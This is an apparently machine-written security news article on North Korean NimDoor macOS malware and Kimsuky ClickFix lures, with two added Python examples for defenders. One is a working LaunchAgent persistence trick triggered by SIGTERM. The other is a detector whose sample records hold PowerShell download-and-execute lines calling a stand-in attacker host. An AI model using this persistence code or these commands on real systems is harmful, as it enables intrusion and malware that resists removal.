Ethical Hacking News
North Korean threat actors have been observed targeting Web3 and cryptocurrency businesses with macOS malware written in the Nim programming language, which SentinelOne tracks as NimDoor. The intrusion chain relies on social engineering (a fake "Zoom SDK update" script) and on a novel persistence mechanism that abuses SIGINT/SIGTERM signal handlers so that killing the malware installs persistence rather than removing it. Separately, the North Korea-linked group Kimsuky, whose long-running activity Genians tracks under the "BabyShark" campaign name, has been adapting the ClickFix social engineering technique, quickly folding publicly known methods into script-based execution chains. As both actors keep evolving their TTPs, organizations in the Web3 space need to stay alert and harden endpoints and user awareness against these lures.
Key points:
- North Korean threat actors are targeting Web3 and cryptocurrency-related businesses with macOS malware written in Nim, tracked by SentinelOne as NimDoor.
- The actors' tactics, techniques, and procedures (TTPs) are in constant evolution.
- A novel persistence mechanism uses SIGINT/SIGTERM signal handlers that install persistence when the malware process is terminated.
- Social engineering is used to trick targets into opening malicious files or running a bogus script update.
- A C++ loader called InjectWithDyldArm64 injects a payload into a suspended process; the malware then contacts a remote server and fetches commands.
- The malware gathers system information, runs arbitrary commands, and changes the current working directory.
- Trojan1_arm64 can download additional payloads that harvest credentials and extract data from web browsers and Telegram.
- A collection of Nim-based executables serves as a launchpad for CoreKitAgent, which monitors for user attempts to kill the malware process.
In a recent surge of cyber threats, North Korean hackers have been observed targeting Web3 and cryptocurrency-related businesses with malware written in the Nim programming language. The threat actors' tactics, techniques, and procedures (TTPs) demonstrate a constant evolution of their strategies, underscoring the ongoing need for robust cybersecurity measures.
According to SentinelOne researchers Phil Stokes and Raffaele Sabato, the threat actors employ a process injection technique and communicate with their infrastructure over wss, the TLS-encrypted variant of the WebSocket protocol. They also use a novel persistence mechanism: the malware registers handlers for SIGINT and SIGTERM, so that a user's attempt to kill the process, or a system shutdown, triggers installation of persistence instead of a clean exit.
The cybersecurity company is tracking the malware components collectively under the name NimDoor. Interestingly, some aspects of the campaign were previously documented by Huntabil.IT and later by Huntress and Validin, but with differences in the payloads deployed.
The attack chains involve social engineering tactics, approaching targets on messaging platforms like Telegram to schedule a Zoom meeting via Calendly, an appointment scheduling software. The target is then sent an email containing a supposed Zoom meeting link along with instructions to run a Zoom SDK update script to ensure that they are running the latest version of the videoconferencing software.
This step results in the execution of an AppleScript that acts as a delivery vehicle for a second-stage script from a remote server, while ostensibly redirecting the user to a legitimate Zoom redirect link. The newly downloaded script subsequently unpacks ZIP archives containing binaries responsible for setting up persistence and launching information-stealing bash scripts.
At the heart of the infection sequence is a C++ loader called InjectWithDyldArm64 (aka InjectWithDyld), which decrypts two embedded binaries named Target and trojan1_arm64. InjectWithDyldArm64 launches Target in a suspended state, injects trojan1_arm64's code into it, and then resumes the suspended process.
The injected malware then establishes communication with a remote server and fetches commands that let it gather system information, run arbitrary commands, and change or set the current working directory. The results of each command are sent back to the server.
Trojan1_arm64, for its part, is capable of downloading two more payloads, which come fitted with capabilities to harvest credentials from web browsers like Arc, Brave, Google Chrome, Microsoft Edge, and Mozilla Firefox, as well as extract data from the Telegram application.
Also dropped as part of the attacks is a collection of Nim-based executables that are used as a launchpad for CoreKitAgent, which monitors for user attempts to kill the malware process. Any user-initiated termination of the malware therefore results in the (re)deployment of the core components, making the implant resilient to basic defensive actions such as killing the process.
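To make the signal-handler trick described above concrete, here is an added Python example; it is not SentinelOne's tooling and not code recovered from NimDoor or CoreKitAgent. It installs SIGINT/SIGTERM handlers that, on the first termination attempt, write a LaunchAgent plist (RunAtLoad plus KeepAlive, so launchd relaunches the program at login and after every exit), and pairs that with a small hunt that flags auto-starting agents pointing outside trusted system paths. Everything is written into a temporary directory rather than ~/Library/LaunchAgents; the label com.example.corekit and the program path /tmp/.corekit/agent are hypothetical, not observed indicators.

```python
"""Signal-handler persistence, as described for NimDoor, next to a LaunchAgent
hunt. Added example: not SentinelOne's tooling and not code recovered from the
malware. It writes only into a caller-supplied directory, never into
~/Library/LaunchAgents."""
import os
import plistlib
import signal
import tempfile

LABEL = "com.example.corekit"          # hypothetical label, not an observed IOC
PROGRAM = "/tmp/.corekit/agent"        # hypothetical path, not an observed IOC

# Prefixes a LaunchAgent is normally expected to point at. Heuristic only:
# legitimate third-party agents (e.g. under ~/Library/Application Support) match too.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/",
                    "/Library/Apple/")


def write_launch_agent(agents_dir, program, label=LABEL):
    """Write a LaunchAgent plist that starts `program` at login (RunAtLoad)
    and restarts it whenever it exits (KeepAlive). Returns the plist path."""
    os.makedirs(agents_dir, exist_ok=True)
    path = os.path.join(agents_dir, label + ".plist")
    with open(path, "wb") as fh:
        plistlib.dump({"Label": label, "ProgramArguments": [program],
                       "RunAtLoad": True, "KeepAlive": True}, fh)
    return path


def arm_persistence_on_kill(agents_dir, program):
    """Install SIGINT/SIGTERM handlers so that Ctrl-C or `kill <pid>` writes
    persistence instead of ending the process. Returns a dict that records
    the plist path once a termination attempt has been seen."""
    state = {"installed": None}

    def on_signal(signum, frame):
        # Nothing touches disk until someone tries to terminate the process;
        # the termination attempt itself is the trigger.
        state["installed"] = write_launch_agent(agents_dir, program)
        # A real implant would exit here and rely on launchd to restart it;
        # this demo keeps running so the result can be inspected.

    signal.signal(signal.SIGINT, on_signal)
    signal.signal(signal.SIGTERM, on_signal)
    return state


def hunt_launch_agents(agents_dir):
    """Return (label, program) for every plist in agents_dir that auto-starts
    (RunAtLoad or KeepAlive) and whose program lies outside TRUSTED_PREFIXES.
    Unparseable plists are reported as well."""
    hits = []
    if not os.path.isdir(agents_dir):
        return hits
    for name in sorted(os.listdir(agents_dir)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(agents_dir, name), "rb") as fh:
                plist = plistlib.load(fh)
        except Exception:
            hits.append((name, "unparseable plist"))
            continue
        args = plist.get("ProgramArguments") or [plist.get("Program", "")]
        program = args[0] if args else ""
        autostart = bool(plist.get("RunAtLoad")) or bool(plist.get("KeepAlive"))
        if autostart and not program.startswith(TRUSTED_PREFIXES):
            hits.append((plist.get("Label", name), program))
    return hits


def demo():
    """Arm the handlers, deliver SIGTERM to ourselves (SIGKILL could not be
    caught this way), then hunt the sandbox directory. Returns
    (plist_path, hunt_hits)."""
    sandbox = tempfile.mkdtemp(prefix="launchagents_demo_")
    state = arm_persistence_on_kill(sandbox, PROGRAM)
    signal.raise_signal(signal.SIGTERM)   # synchronous: handler runs before return
    return state["installed"], hunt_launch_agents(sandbox)


if __name__ == "__main__":
    print(demo())
```

Run it directly to see the plist path and the single hunt hit. The responder-side lesson is in `demo()`: sending SIGTERM to a process that traps it is exactly what triggers the write, so snapshot ~/Library/LaunchAgents and /Library/LaunchDaemons before and after terminating a suspect process, and prefer SIGKILL, which cannot be caught by a handler (though persistence may already be in place by then). On a real host, point `hunt_launch_agents` at ~/Library/LaunchAgents and treat hits as leads, not verdicts.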
The NimDoor findings coincide with a separate report from South Korean security firm Genians on Kimsuky, a North Korea-linked group whose long-running activity is tracked under the "BabyShark" campaign name, adopting the ClickFix social engineering technique. Genians noted that the attackers tried to trick the target into opening a manual and entering an authentication code, supposedly required to access a secure document. Whereas the original 'ClickFix' tactic tricked users into clicking to fix a specific error, this variant prompts users to copy and paste an authentication code to access a secure document.
A similar tactic was documented by Proofpoint in April 2025, with the difference being that the email message claimed to originate from a Japanese diplomat and urged the recipient to set up a meeting with the Japanese ambassador to the United States.
Once the obfuscated malicious PowerShell command is executed, a decoy Google Docs file is used as a distraction to conceal the execution of malicious code that establishes persistent communication with a C2 server to collect data and deliver additional payloads.
A second variant of the ClickFix strategy entails using a fake website mimicking a legitimate defense research job portal and populating it with bogus listings, causing site visitors who click on these postings to be served with a ClickFix-style pop-up message to open the Windows Run dialog and run a PowerShell command.
The command, for its part, guided users to download and install the Chrome Remote Desktop software on their systems, enabling remote control over SSH via the C2 server "kida.plusdocs.kro[.]kr." Genians discovered a directory listing vulnerability in the C2 server that publicly exposed data likely collected from victims located across South Korea.
The C2 server also included an IP address from China, which has been found to contain a keylogging record for a Proton Drive link hosting a ZIP archive that's used to drop BabyShark malware on the infected Windows host by means of a multi-stage attack chain.
As recently as last month, Kimsuky is believed to have devised yet another ClickFix variant in which phony Naver CAPTCHA verification pages instruct visitors to copy and paste a PowerShell command into the Windows Run dialog; the command launches an AutoIt script that siphons user information.
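All of the ClickFix variants above share a process-creation footprint: something the user pasted into the Run dialog, so a PowerShell (or similar) child of explorer.exe, with hidden-window, policy-bypass, download-and-execute, Chrome Remote Desktop enrolment or AutoIt indicators on the command line. The following Python is an added example of hunting for that footprint over constructed Sysmon Event ID 1-style records; it is not Genians', Proofpoint's or any other vendor's detection logic. The host attacker.invalid, the file names, the machine name and the enrolment code in the sample records are invented, and the weights and threshold are starting points, not tuned values.

```python
"""Hunt for ClickFix-style executions: a PowerShell (or similar) process
launched from Explorer's Run dialog with hidden-window, policy-bypass,
download-and-execute, Chrome Remote Desktop enrolment or AutoIt indicators.
Added example over constructed records; not any vendor's detection logic."""
import base64
import re


def _utf16_b64(script):
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# Host attacker.invalid, file names, machine name and enrolment code are invented.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -ep bypass -c "iwr http://attacker.invalid/s.txt | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -nop -enc " + _utf16_b64("iex (iwr http://attacker.invalid/a)")},
    {"Image": r"C:\Program Files (x86)\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Program Files (x86)\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="4/0AX-constructed" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=DESKTOP-VICTIM'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Users\dev\scripts\build.ps1"},  # benign: a developer's script
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -c "iwr http://attacker.invalid/cap.zip -OutFile $env:TEMP\cap.zip; Expand-Archive $env:TEMP\cap.zip $env:TEMP\cap; & $env:TEMP\cap\AutoIt3.exe $env:TEMP\cap\naver.au3"'},
]

# Interpreters a Run-dialog paste typically lands in, and the parent that the
# Run dialog spawns them from.
CHILD_LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "msiexec.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}

# (reason, weight, pattern). Weights are illustrative starting points.
INDICATORS = [
    ("hidden window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", 1, re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)),
    ("download cradle", 2, re.compile(
        r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget|bitsadmin)\b", re.I)),
    ("in-memory execution (iex)", 2, re.compile(r"\biex\b|invoke-expression", re.I)),
    ("Chrome Remote Desktop headless enrolment", 3, re.compile(r"remoting_start_host.*--code=", re.I)),
    ("AutoIt interpreter", 1, re.compile(r"autoit3(?:_x64)?\.exe|\.au3\b", re.I)),
]
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmdline):
    """Return (text, was_encoded). If -EncodedCommand is present, the base64
    blob is replaced by the decoded UTF-16LE script so indicators inside it
    (a cradle, iex) are visible to the scan."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, False
    return cmdline[:m.start(1)] + decoded + cmdline[m.end(1):], True


def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    score, reasons = 0, []
    child, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    if child in CHILD_LOLBINS and parent in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append(f"{child} spawned by {parent} (Run dialog)")
    text, was_encoded = expand_encoded(ev["CommandLine"])
    if was_encoded:
        score += 1
        reasons.append("encoded command (decoded for scanning)")
    for reason, weight, rx in INDICATORS:
        if rx.search(text):
            score += weight
            reasons.append(reason)
    return score, reasons


def hunt(events, threshold=3):
    """Return [(index, score, reasons)] for records scoring at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for idx, score, reasons in hunt(SAMPLE_EVENTS):
        print(idx, score, reasons)
```

The benign fourth record shows why the explorer.exe to powershell.exe relationship alone should not page anyone: it scores 2 and stays below the threshold, while the encoded second record is caught only because the blob is decoded before the indicator scan. For Windows Security event 4688 swap the field names to NewProcessName, ParentProcessName and CommandLine (command-line auditing must be enabled); for a hit, pull the decoded script and the URL it fetches, and check whether a Chrome Remote Desktop host was enrolled.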
"The 'BabyShark' campaign is known for its swift adoption of new attack techniques, often integrating them with script-based mechanisms," the company said. "The 'ClickFix' tactic discussed in this report appears to be another case of publicly available methods being adapted for malicious use."
In recent weeks, Kimsuky has also been linked to email phishing campaigns that seemingly originate from academic institutions, but distribute malware under the pretext of reviewing a research paper.
According to AhnLab, the attacks begin with spear-phishing emails with compressed archive attachments containing a Windows shortcut (LNK) file, which is likely used to drop a PowerShell script that then downloads and launches the decoy document, as well as executes Xeno RAT and a PowerShell information stealer.
Other attack sequences have been found to utilize a PowerShell-based downloader that fetches a file with an RTF extension from Dropbox to ultimately launch Xeno RAT. The campaign shares infrastructure overlaps with another set of attacks that delivered a variant of Xeno RAT known as MoonPeak.
"The attacker managed not only the malware used in attacks but also uploaded and maintained infected system log files and exfiltrated information in private repositories using GitHub Personal Access Tokens (PAT)," ENKI noted. "This ongoing activity highlights the persistent and evolving nature of Kimsuky's operations, including their use of both GitHub and Dropbox as part of their infrastructure."
Kimsuky, per data from NSFOCUS, has been one of the most active North Korean threat groups, alongside Konni, accounting for 5% of the 44 advanced persistent threat (APT) activities recorded by the Chinese cybersecurity company in May 2025. In April, the top three most active APT groups were Kimsuky, Sidewinder, and Konni.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Launch-Sophisticated-Nim-Malware-Campaign-Targeting-Web3-and-Cryptocurrency-Businesses-ehn.shtml
https://thehackernews.com/2025/07/north-korean-hackers-target-web3-with.html
https://www.bleepingcomputer.com/news/security/north-korean-hackers-adopt-clickfix-attacks-to-target-crypto-firms/
Published: Wed Jul 2 14:52:02 2025 by llama3.2 3B Q4_K_M